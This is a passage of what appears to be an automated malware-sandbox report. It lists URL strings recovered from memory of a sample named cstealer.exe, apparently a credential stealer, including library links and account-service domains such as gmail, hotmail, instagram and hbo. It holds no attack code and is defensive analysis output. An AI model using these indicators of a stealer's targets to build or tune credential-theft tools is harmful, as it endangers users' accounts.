                                Source: cstealer.exe, 00000003.00000003.2455332650.00000271D9E2D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542350232.00000271D9E45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2470513280.00000271D9E3D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2625581218.00000271D9E5B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552117911.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2222114671.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286219143.000002010319B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281510656.000002010319A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103182000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273515277.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 0000002F.00000003.2441436084.000001CBB7EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                                Source: cstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                Source: cstealer.exe, 00000003.00000002.2607686027.00000271D99E8000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB838000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                Source: cstealer.exe, 00000009.00000003.2199547261.0000020100D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                Source: cstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                Source: cstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                Source: cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                Source: cstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2520480838.00000271DA138000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455429360.00000271DA12B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179233556.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288437709.0000020102E0B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                Source: cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                Source: cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/29203
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmail.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmail.com)z
                                Source: cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2665159466.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2490199129.00000271D9FDB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496547521.00000271D9FF4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2435547245.00000271D9FDA000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276170958.0000020102A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                Source: cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284408959.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339153466.0000020102E1D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                Source: cstealer.exe, 00000009.00000003.2285794515.0000020102C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hbo.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hbo.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hotmail.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hotmail.com)z
                                Source: cstealer.exe, 00000003.00000003.2176699163.00000271DA472000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2518198896.00000271DA47C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517694061.00000271DA477000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA474000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2472061599.00000271DA473000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                Source: cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                Source: cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2354769471.0000020103163000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289505736.0000020102E05000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272760282.0000020102C7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2333684327.0000020102DC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274816378.0000020102DA7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290506090.0000020102CB7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DA7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.000002010315F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DBC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284047329.0000020102C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2647937867.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2544001972.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553966495.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215216888.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212971646.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214455444.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221596067.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217913546.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280237050.0000020102AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                Source: cstealer.exe, 00000009.00000002.2391379730.00000201036B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)z
                                Source: cstealer.exe, 00000003.00000002.2685159509.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552853520.00000271D9E61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496638039.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2526154847.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2465182617.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475893944.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 